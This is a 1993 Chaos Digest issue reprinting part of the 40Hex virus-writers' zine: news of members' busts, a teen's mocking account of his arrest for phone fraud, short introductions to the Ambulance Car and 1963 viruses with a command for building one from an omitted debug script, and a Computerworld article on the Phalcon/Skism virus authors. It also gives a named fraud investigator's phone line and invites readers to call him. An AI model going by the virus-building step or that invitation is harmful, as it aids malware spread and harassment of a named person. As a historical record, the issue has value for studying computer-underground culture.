Chaos Digest          Monday 7 June 1993          Volume 1 : Number 46
                        ISSN 1244-4901

    Editor: Jean-Bernard Condat (jbcondat@attmail.com)
    Archivist: Yves-Marie Crabbe
    Co-Editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.46 (7 June 1993)
File 1--40H VMag Number 5 Volume 2 Issue 1 #000-004 (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to:

    linux-activists-request@niksula.hut.fi

with a mail header or first line containing the following information:

    X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP:

    * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
    * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
    * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
    * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
    * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
    * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
    * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
    * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 5 Volume 2 Issue 1 #000-004 (reprint)

40Hex Number 5 Volume 2 Issue 1 File 000

Welcome to Issue 5 of 40Hex, the monthly semi-annual magazine published for all those interested in learning more about computer viruses.

Lots of new news:

1) Well, Hellraiser has lost computer and housing temporarily, so DecimatoR had taken over the magazine. There has been so much new stuff, a lot got changed since the time I received this issue. Special BIG ASS greets to him for all of his work on this issue.

2) Digital Warfare is down, as Instigator got busted for phreaking. We will let you know more when we know more. Before its demise, its virus collection had grown incredibly, thus stocking 40Hex for life.

3) LandFill BBS went back up. I am back in the scene again. Give it a ring.

4) As of the release of this file, I have heard of more busts, specifically, Gengis Kahn and Rain Man.... could be rumor.

BTW, for those of you who have the "Anti-FiRe" virus, SCAN 86 catches it as "Infinity"... probably due to the text it contains. Course, it was distributed on a VGA loader for the InFiniTy boards... heh heh heh...

    DecimatoR
    -)GHeap

40 Hex Mag Issue 5

File 000..............................You Are Here
File 001..............................BUSTED! Instigator's Story
File 002..............................Virus Spotlight: Ambulance Car
File 003..............................The 1963 Virus
File 004..............................Alliance w/McAfee and Dvorak
File 005..............................Virus Author's Constitution
File 006..............................The SKISM Vengeance Virus Hex
File 007..............................Finding Scan Strings II

Greets go out to: Hellraiser, Dark Angel, Demogorgon, Piff', Paragon Dude, Instigator, Night Crawler, Crow Meister, Lazarus Long, Time Lord, Axiom Codex, and the rest of the Alliance crew.

+++++

40Hex Number 5 Volume 2 Issue 1 File 001

Instigator --- Busted!

At 2:40 pm EST, Jan 20, '92 a local cop pulled Instigator (me) out of my very entertaining Social Studies class and informed me he, 1 other local cop and 2 MCI phone fraud investigators were gonna serve a warrant on my house and confiscate my computer shit.

So the cop takes me to my house and they start disassembling all of my computer stuff, and take all of my notes and shit. They filmed all this. They informed me I would be charged with theft of services, credit card fraud and a bunch of other shit, like 3 felonies and 5 misdemeanors till they were done.

Anyways it's about a week and a half after the incident now and they only formally charged me with theft of services. So the worst that is gonna happen is I will get 1 year of probation. The best thing is they are thinking of only giving me a citation or totally dropping the charges. I am supposed to get my system back after the DA comes to my house so I can show him how I did it.

As for Digital Warfare I wanna give to someone to set up.
Anyway I made it to the front page of 3 local newspapers so here is one of the articles:

-----------------------------------------------------------------------------

(Shit inside the ***( )*** are my comments)

From the front page of the Intelligencer Journal

2 "Hackers" caught stealing phone service

Using sophisticated computers and telephones, two Lancaster County computer hackers touched MCI, a Washington-based telephone communications network, for approximately $4,700 last year. ***( Sophisticated phones? )***

Their activities represent "only the tip of the iceberg" of telecommunications fraud, which carries an annual $1 billion to $1.5 billion price tag, according to John Houser, a MCI spokesman. ***( Dick )***

The two are accused of accessing MCI's computer and obtaining "25 card numbers, that we know about," Houser said. "We know they made calls all over the United States, to Canada, Great Britain, and West Germany."

"None of the card numbers have been issued to Lancaster subscribers," Houser said.

Columbia police are charging an 18 year old borough resident with credit card fraud, unlawful use of a computer, theft of services, and criminal conspiracy according to Sgt. C. Joseph Smith. Police are withholding his identity until he is formally charged, Smith said.

West Donegal Township chief Charles R. Bronte said a fifteen year old suspect ***( that's me! )*** living in his jurisdiction was being referred to juvenile authorities by the department investigator, Cpl. Kenton Whitebread.

Officers with both departments said this was an entirely new kind of criminal case for them. "I'm still going over our suspect's statement," said Smith, "and even when I'm done, I don't think I'm going to understand (all the technical jargon). We're getting a lot of help from MCI."

"If our juvenile hadn't cooperated, it's possible we'd still be looking at his equipment", Bronte said. "He went into the computer, using his access codes," ***( He means I logged on my board )*** " to retrieve the information necessary to continue the investigation".

Police confiscated computer telephone equipment, whose value is estimated ***( Estimated - Gimme a break!)*** in the thousands of dollars, when they executed search warrants at the residences of both suspects, Jan. 20.

"It was a real United Nations collection," said Bronte, "There were a number of different manufacturers" of the equipment taken in West Donegal. ***( United Nations collection? )***

Most of the equipment taken in Columbia was made by Tandy, Smith said. Both possessed programs and equipment which allowed their computers to generate thousands of random numbers.

Houser said that once an individual had knowledge of MCI's calling card format "they could access our computer switching equipment, and begin generating random numbers. ***( they make it sound so technical )*** They could allow their equipment to run 24 hours a day."

Houser declined discussing the company security, but acknowledged "We became aware of an unusual number of calls coming into our computer line. We eventually were able to trace those calls back to the originating telephone equipment." ***( ANI )***

Bronte said MCI investigators arrived at his department early Monday afternoon. The warrant was executed at 2 pm, Bronte said. "We took investigators to the suspect's home, while Cpl. Whitebread picked up the boy at his school."

Smith said the Columbia warrant was served at 5:18pm on Monday. The suspect and another individual were working on his computer at the time. "They weren't doing anything illegal," he said.

Smith said MCI first became aware of the two local hackers "about Dec. 14". They were monitoring them since."

The officers said they did not believe either of the two profited from their activities. ***( Free Phone calls! )***

"I think it was just a case of him getting involved in something that was entirely over his head," Bronte said. ***( Yeah, right )***

Houser said MCI's investigation was continuing. "We have reason to believe they shared some of their information with others," he said. "At this time I can tell you we have no other suspects in Pennsylvania, but that could change tomorrow."

He said investigators were unsure at present if any of the computer data had been transmitted to other hackers. ***( They said one paragraph up that they thought we shared some of the information.. Duh )***

-----------------------------------------------------------------------------

Update --
++++++

Here is the current casualties on the 476-9696 system, which is owned by TeleConnect, a subsidiary of MCI.

Instigator ----- $1970.70 ----- Theft of Services (1 Count)
Asphi      ----- $2700.00 ----- Unlawful Use of Computer
                                Credit Card Fraud
                                Theft Of Services
                                Criminal Conspiracy
Dekion     ----- UNKNOWN  ----- UNKNOWN
Count Zero ----- $83.63   ----- No Charges Just Billed (*)
VenoM      ----- $75.00   ----- No Charges Just Billed (*)

Apparently the head of the operations is Terry Oakes. He is the phone Fraud investigator in charge of the TeleConnect Investigations. Give him a ring at 800-476-1234 Ext. 3045. Thank you.

(*) In both cases parents were notified.

    -)GHeap

+++++

40Hex Number 5 Volume 2 Issue 1 File 002

Virus Spotlight: The Ambulance Car Virus

Here's a debug script of the Ambulance Car virus. I've tested the virus created from this, and it works.

Ambulance Car is a parasitic, non-resident .COM infector. It spreads rapidly, and has one of the neatest graphic displays that I've seen yet in a virus. When it activates, a little ambulance drives across the bottom of the screen, from left to right, and a siren is heard over the PC speaker. Other than that, all this thing does is replicate.
To create the virus from the debug script, cut between the dotted lines and type:

    DEBUG < REDX.TXT > NUL

    DA

+++++

40Hex Number 5 Volume 2 Issue 1 File 003

The 1963 Virus

Here's a debug script of 1963. It's classified as an overwriting virus, but it attaches the code it overwrites onto the end of the file it infects... so it overwrites, but it doesn't. Sort of.
+++++

40Hex Number 5 Volume 2 Issue 1 File 004

Forty Hex 5 Presents

An Alliance Interview with John McAfee + Jon Dvorak
and
Hellraiser, Garbageheap, DecimatoR, Count Zero, CRoW MeiSTeR, Instigator, Demogorgon, Dark Angel, Night Crawler, VenoM, Time Lord, Darkman.

On Feb. 2nd of 1992, an alliance was run with members of PHALCON/SKISM, NuKE, and Ex-RABiD. We started the conference by trying to call Patti Hoffman, who had a shit fit, and denied being the author of VSUM. Nice of her to insult our intelligence. But anyways, we then called McAfee, who was surprisingly a nice guy. He was interested in what we had to say. Some of the topics covered were which viruses we had written, what types of viri they were (i.e. MemRes, Stealth...).
Another important topic covered the Bob Ross Virus which an associate of McAfee had misnamed the Beta Virus (it was first spread on a false version of BNU (1.90Beta)).

On the following day, we started a second alliance, this time involving Count Zero, CRoW MeiSTeR, Dark Angel, Demogorgon, Garbageheap (moi!), Hellraiser, Instigator, Night Crawler and Time Lord. Also in the conference were John Markoff (New York Times), Michael Alexander (Computer World), and John McAfee. A variety of topics were covered, I won't go into specifics here, because in a future issue we will have a full transcript, and in this issue we will have the article from the Feb. 10, 1992 Vol. XXVI No. 6 issue of COMPUTERWORLD.

---------------------------------------------------------------------------

CHALLENGE, NOTORIETY CITED AS IMPETUS FOR VIRUS DEVELOPERS (*Catchy title*)

By: Michael Alexander/CW STAFF

What motivates a programmer to write a virus? The thrill, declared Hell Raiser, (* that is supposed to be Hellraiser *) a self-styled virus author and a member of Phalcon/Skism, a group of about a dozen computer hackers scattered across North America.

In an unusual telephone conference call to COMPUTERWORLD last week, 10 callers who said they were members of Phalcon/Skism claimed to be responsible for writing several of the viruses now on the loose. (* CLAIMED?!?!?!! Well, I suppose that he couldn't know if we were the real McCoy *)

To protect their identities, the callers used such handles as Garbage Heap (* Grabbin' top billin'! *), Nightcrawler, Demogorgon, Dark Angel, and Time Lord. They said their ages range from 15 to 23 years old, although COMPUTERWORLD could not independently verify their identities.

GETTING ATTENTION
+++++++++++++++++

The virus authors, as they called themselves, said they arranged the teleconference to air their side of the story, and to talk about their unorthodox and contradictory brand of computer ethics. (* Well... close, we were real bored... of course, who wants to talk to bored virus authors... *)

"For the most part, virus authors are seen as a lot more malicious than we actually are," Garbage Heap said. His compatriots said they write viruses mainly for the thrill but also for the challenge and the status it brings within the computer underground. The group said it is not interested in doing harm, and seldom creates viruses that are deliberately designed to cause damage.

"It's sort of like graffiti - getting our name across - and damage happens in the process," he claimed. (* Hellraiser *)

As an example of the type of virus they write, the group took credit for writing the Bob Ross Virus, named after the painter of the same name who hosts a show on Public Broadcasting Service.

"What it does is infect files and randomly displays 'Bobisms,' which are messages Bob Ross would say," Hell Raiser said. "It doesn't format the hard drive or do any damage."

However, other alleged members of Phalcon/Skism later admitted to writing viruses that are clearly intended to damage or destroy programs and data. (* Hellraiser again... *)

The callers contended that they are virus "authors," not virus "spreaders," and that they are not responsible for the problems their creations cause.

"The main difference is that an author may write a virus and may even upload that virus to a virus board, a [bulletin board system] oriented to virus programmers and spreaders," one virus author explained.

"People, like a disgruntled employee who may have a gripe with someone else, download it and spread it that way," this virus author said.

NOT LAWBREAKERS
+++++++++++++++

The virus authors also pointed out that since the act of writing a virus is not prohibited by law, they should not be viewed as criminals.

The callers claimed that even if the group stopped writing viruses, the number of infections would not decline. The problem of viruses has grown so large that new viruses have no impact overall, one said.

"Our effect is fairly little," he asserted.

The callers said that they have been writing viruses for about a year, and would probably continue for at least another year. Eventually, they hope to find jobs as full time programmers, several said.

There is no way to verify the callers' claims. However, many of the monikers the callers used, as well as the name "Phalcon/Skism," have shown up in perhaps as many as half - about 100 - of the viruses to appear in the past six or seven months, said John McAfee, president of McAfee Associates, an antivirus software publisher based in Santa Clara, Calif.

The quality of the viruses is "mediocre," McAfee said. (* Can't win 'em all can we, John? *)

---------------------------------------------------------------------------

My thoughts on the article were that it was neutral, Mr. Alexander could have easily ripped us apart. We didn't expect to come out looking like heroes, so why should we bitch. Next month prepare for the official transcript of the interview. Then we can truly establish what was said.

    -)GHeap

------------------------------

End of Chaos Digest #1.46
************************************

Downloaded From P-80 International Information Systems 304-744-2253